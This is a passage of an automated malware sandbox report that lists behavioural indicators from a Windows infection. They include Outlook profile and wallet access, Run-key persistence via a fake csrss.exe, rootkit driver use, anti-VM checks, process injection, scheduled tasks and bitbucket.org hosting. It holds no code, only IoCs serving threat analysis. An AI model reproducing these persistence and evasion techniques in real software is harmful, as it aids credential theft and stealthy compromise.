behavioral2/files/0x0007000000023535-742.dat	themida
behavioral2/files/0x0007000000023535-743.dat	themida

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OlHIbQCQzMDwcktuUDGh8kb_.exe
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OlHIbQCQzMDwcktuUDGh8kb_.exe
Key opened	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OlHIbQCQzMDwcktuUDGh8kb_.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	20OAIXUdr4wvUDcH8dpdDTfg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	9QiHXYjbvykQRsyWHraOQHU3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	pwZ35FqiU3OeBSS0JTof8T37.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	pwZ35FqiU3OeBSS0JTof8T37.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	cJDPFsk.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	cJDPFsk.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
520	bitbucket.org
532	bitbucket.org
533	bitbucket.org
558	bitbucket.org
578	bitbucket.org
593	bitbucket.org
506	bitbucket.org
519	bitbucket.org
557	bitbucket.org
577	bitbucket.org

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
699	ipinfo.io
709	ipinfo.io
710	ipinfo.io
497	api.myip.com
498	api.myip.com
499	ipinfo.io
500	ipinfo.io
698	ipinfo.io

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 25 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	cJDPFsk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	EaxuNLp.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	cJDPFsk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	EaxuNLp.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	cJDPFsk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	cJDPFsk.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	cJDPFsk.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
5216	20OAIXUdr4wvUDcH8dpdDTfg.exe
4444	pwZ35FqiU3OeBSS0JTof8T37.exe
396	pwZ35FqiU3OeBSS0JTof8T37.exe

Suspicious use of SetThreadContext 48 IoCs

description	pid	Process	procid_target
PID 5720 set thread context of 2336	5720	4Bt0hCDPbeDogzYRepH92ntN.exe	206
PID 5784 set thread context of 1860	5784	qnXOl8WkCMEDE23eyGbEJpcm.exe	180
PID 5864 set thread context of 4824	5864	qUa84PMRJDEifvgn16InDLia.exe	181
PID 2100 set thread context of 1244	2100	todymdgvwmgb.exe	262
PID 2100 set thread context of 1872	2100	todymdgvwmgb.exe	268
PID 3476 set thread context of 5000	3476	wfplwfs.exe	284
PID 5852 set thread context of 5932	5852	cbfpM7BTr6beIVth9NAXnP2K.exe	286
PID 3476 set thread context of 5816	3476	wfplwfs.exe	377
PID 3476 set thread context of 5376	3476	wfplwfs.exe	394
PID 3476 set thread context of 1776	3476	wfplwfs.exe	332
PID 3476 set thread context of 6128	3476	wfplwfs.exe	410
PID 3476 set thread context of 524	3476	wfplwfs.exe	464
PID 3476 set thread context of 5588	3476	wfplwfs.exe	467
PID 3476 set thread context of 3456	3476	wfplwfs.exe	470
PID 3476 set thread context of 4292	3476	wfplwfs.exe	473
PID 3476 set thread context of 1992	3476	wfplwfs.exe	480
PID 3476 set thread context of 4216	3476	wfplwfs.exe	483
PID 3476 set thread context of 4336	3476	wfplwfs.exe	487
PID 3476 set thread context of 444	3476	wfplwfs.exe	491
PID 3476 set thread context of 3460	3476	wfplwfs.exe	494
PID 3476 set thread context of 4912	3476	wfplwfs.exe	498
PID 3476 set thread context of 1824	3476	wfplwfs.exe	502
PID 3476 set thread context of 3248	3476	wfplwfs.exe	505
PID 3476 set thread context of 4052	3476	wfplwfs.exe	508
PID 3476 set thread context of 964	3476	wfplwfs.exe	511
PID 3476 set thread context of 5944	3476	wfplwfs.exe	514
PID 3476 set thread context of 716	3476	wfplwfs.exe	517
PID 3476 set thread context of 3208	3476	wfplwfs.exe	521
PID 3476 set thread context of 2436	3476	wfplwfs.exe	524
PID 3476 set thread context of 5820	3476	wfplwfs.exe	527
PID 3476 set thread context of 2932	3476	wfplwfs.exe	532
PID 3476 set thread context of 4528	3476	wfplwfs.exe	537
PID 3476 set thread context of 4916	3476	wfplwfs.exe	540
PID 3476 set thread context of 4376	3476	wfplwfs.exe	543
PID 3476 set thread context of 2868	3476	wfplwfs.exe	546
PID 3476 set thread context of 5244	3476	wfplwfs.exe	550
PID 3476 set thread context of 1940	3476	wfplwfs.exe	554
PID 3476 set thread context of 4948	3476	wfplwfs.exe	557
PID 3476 set thread context of 1544	3476	wfplwfs.exe	560
PID 3476 set thread context of 5084	3476	wfplwfs.exe	565
PID 3476 set thread context of 2392	3476	wfplwfs.exe	568
PID 3476 set thread context of 4960	3476	wfplwfs.exe	571
PID 3476 set thread context of 1520	3476	wfplwfs.exe	575
PID 3476 set thread context of 2904	3476	wfplwfs.exe	578
PID 3476 set thread context of 5068	3476	wfplwfs.exe	582
PID 3476 set thread context of 3904	3476	wfplwfs.exe	585
PID 3476 set thread context of 4656	3476	wfplwfs.exe	588
PID 3476 set thread context of 1908	3476	wfplwfs.exe	591

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	9QiHXYjbvykQRsyWHraOQHU3.exe
File opened (read-only)	\??\VBoxMiniRdrDN	N0ycQ3j_C9A6WtSTJQw2tiLl.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MLgsFiQZVGPFC\LZsLzIb.dll	cJDPFsk.exe
File created	C:\Program Files (x86)\GsaTYgRyU\qhimsB.dll	cJDPFsk.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	cJDPFsk.exe
File created	C:\Program Files (x86)\GsaTYgRyU\PDBLUwW.xml	cJDPFsk.exe
File created	C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR\OvkmNPF.xml	cJDPFsk.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	cJDPFsk.exe
File created	C:\Program Files (x86)\MLgsFiQZVGPFC\nDQNuZt.xml	cJDPFsk.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	cJDPFsk.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	cJDPFsk.exe
File created	C:\Program Files (x86)\qTfgnrSTWnbSkbXTBhR\bMKslHI.dll	cJDPFsk.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	cJDPFsk.exe
File created	C:\Program Files (x86)\GcyGSsVYQkTU2\IqQhqiymjsSBM.dll	cJDPFsk.exe
File created	C:\Program Files (x86)\GcyGSsVYQkTU2\pYdOIyN.xml	cJDPFsk.exe
File created	C:\Program Files (x86)\SmDRsXLCRkUn\dLsGSBt.dll	cJDPFsk.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\DQnnXGLTfcpIzSAgg.job	schtasks.exe
File created	C:\Windows\Tasks\9e3666340c111961.job	wfplwfs.exe
File opened for modification	C:\Windows\rss	9QiHXYjbvykQRsyWHraOQHU3.exe
File created	C:\Windows\INF\netsstpa.PNF	Process not Found
File created	C:\Windows\Tasks\vsUaqXwzRclhPPXIZ.job	schtasks.exe
File created	C:\Windows\INF\netrasa.PNF	Process not Found
File created	C:\Windows\Tasks\GpZJAKvqmTHzdqp.job	schtasks.exe
File opened for modification	C:\Windows\rss	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
File created	C:\Windows\rss\csrss.exe	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
File created	C:\Windows\rss\csrss.exe	9QiHXYjbvykQRsyWHraOQHU3.exe
File created	C:\Windows\Tasks\bbINNCpbpKlDtqWtmu.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3144	sc.exe
628	sc.exe
5192	sc.exe
1240	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 57 IoCs

pid	pid_target	Process	procid_target
764	2336	WerFault.exe
4916	5368	WerFault.exe	159
5188	5196	WerFault.exe	151
5404	4824	WerFault.exe	181
5760	5368	WerFault.exe	159
1436	5368	WerFault.exe	159
5880	5368	WerFault.exe	159
5172	5368	WerFault.exe	159
5228	5368	WerFault.exe	159
3352	5288	WerFault.exe	155
1760	5368	WerFault.exe	159
5000	5368	WerFault.exe	159
5296	5312	WerFault.exe	156
2524	5932	WerFault.exe	286
3788	5000	WerFault.exe	284
856	5816	WerFault.exe	309
5124	5376	WerFault.exe	322
5504	5360	WerFault.exe	158
1312	1776	WerFault.exe	332
5296	6128	WerFault.exe	410
364	524	WerFault.exe	464
3428	5588	WerFault.exe	467
2132	3456	WerFault.exe	470
5556	4292	WerFault.exe	473
4976	1992	WerFault.exe	480
2368	4216	WerFault.exe	483
5160	4336	WerFault.exe	487
4164	444	WerFault.exe	491
3792	3460	WerFault.exe	494
3216	4912	WerFault.exe	498
5292	1824	WerFault.exe	502
1360	3248	WerFault.exe	505
1912	4052	WerFault.exe	508
5652	964	WerFault.exe	511
5236	5944	WerFault.exe	514
5916	716	WerFault.exe	517
5900	3208	WerFault.exe	521
1884	2436	WerFault.exe	524
8	5820	WerFault.exe	527
5532	2932	WerFault.exe	532
5916	4528	WerFault.exe	537
3796	4916	WerFault.exe	540
860	4376	WerFault.exe	543
3180	2868	WerFault.exe	546
3620	5244	WerFault.exe	550
5684	1940	WerFault.exe	554
4936	4948	WerFault.exe	557
1192	1544	WerFault.exe	560
5196	5084	WerFault.exe	565
1632	2392	WerFault.exe	568
1420	4960	WerFault.exe	571
5116	1520	WerFault.exe	575
1664	2904	WerFault.exe	578
3852	5068	WerFault.exe	582
1152	3904	WerFault.exe	585
3436	4656	WerFault.exe	588
2348	1908	WerFault.exe	591

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JynMWOEPU4IgIbVkKO84zcFB.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JynMWOEPU4IgIbVkKO84zcFB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	v0xDTuqvEPa9a6ZvVWNtlOgW.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	v0xDTuqvEPa9a6ZvVWNtlOgW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htcrjfd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htcrjfd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hccrjfd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JynMWOEPU4IgIbVkKO84zcFB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	v0xDTuqvEPa9a6ZvVWNtlOgW.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	htcrjfd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hccrjfd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hccrjfd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	OneDrive.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	R73AhOT__GA6HZOWmJT_6PE6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	R73AhOT__GA6HZOWmJT_6PE6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OlHIbQCQzMDwcktuUDGh8kb_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	OlHIbQCQzMDwcktuUDGh8kb_.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4792	schtasks.exe
5596	schtasks.exe
5776	schtasks.exe
5460	schtasks.exe
2148	schtasks.exe
3436	schtasks.exe
5636	schtasks.exe
5836	schtasks.exe
6116	schtasks.exe
6088	schtasks.exe
5780	schtasks.exe
812	schtasks.exe
2148	schtasks.exe
5844	schtasks.exe
2888	schtasks.exe
4188	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5604	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4900	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Toolbar	Process not Found

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	cJDPFsk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	N0ycQ3j_C9A6WtSTJQw2tiLl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	9QiHXYjbvykQRsyWHraOQHU3.exe
